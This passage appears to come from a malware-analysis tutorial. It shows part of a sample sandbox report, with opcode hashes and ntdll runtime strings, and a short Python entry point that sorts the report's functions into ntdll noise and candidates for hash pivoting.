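• Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
• Instruction Fuzzy Hash: 3081C270E4524D9FDB088F6CC8917EEBBF1AF55B50F144A6EE850A7299C7348983CB60
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2904728C
Strings
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 29047294
• RTL: Re-Waiting, xrefs: 290472C1
Memory Dump Source
• Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting
• Opcode ID: 9a0c957e159198239edeacf0099312d9170be68a9f35c089d75706c6edd13be9
• Instruction Fuzzy Hash: 1941CE31A0120AABDB14CE25CD41F5AB7E5FFA4710F105E29F955AB280EB21F943CBD1
"""

if __name__ == "__main__":
    noise, candidates, hashes = triage(parse_records(SAMPLE_REPORT))
    print(f"{len(noise)} ntdll-noise functions, {len(candidates)} candidates")
    for h in hashes:
        print("pivot on:", h)
```

Run it on the full Code Analysis section of a report rather than the sample; the candidate list is what remains after ntdll's own helpers are excluded, and the Memory Dump Source fields (Offset, based on PE) let you group the survivors by the region they were carved from.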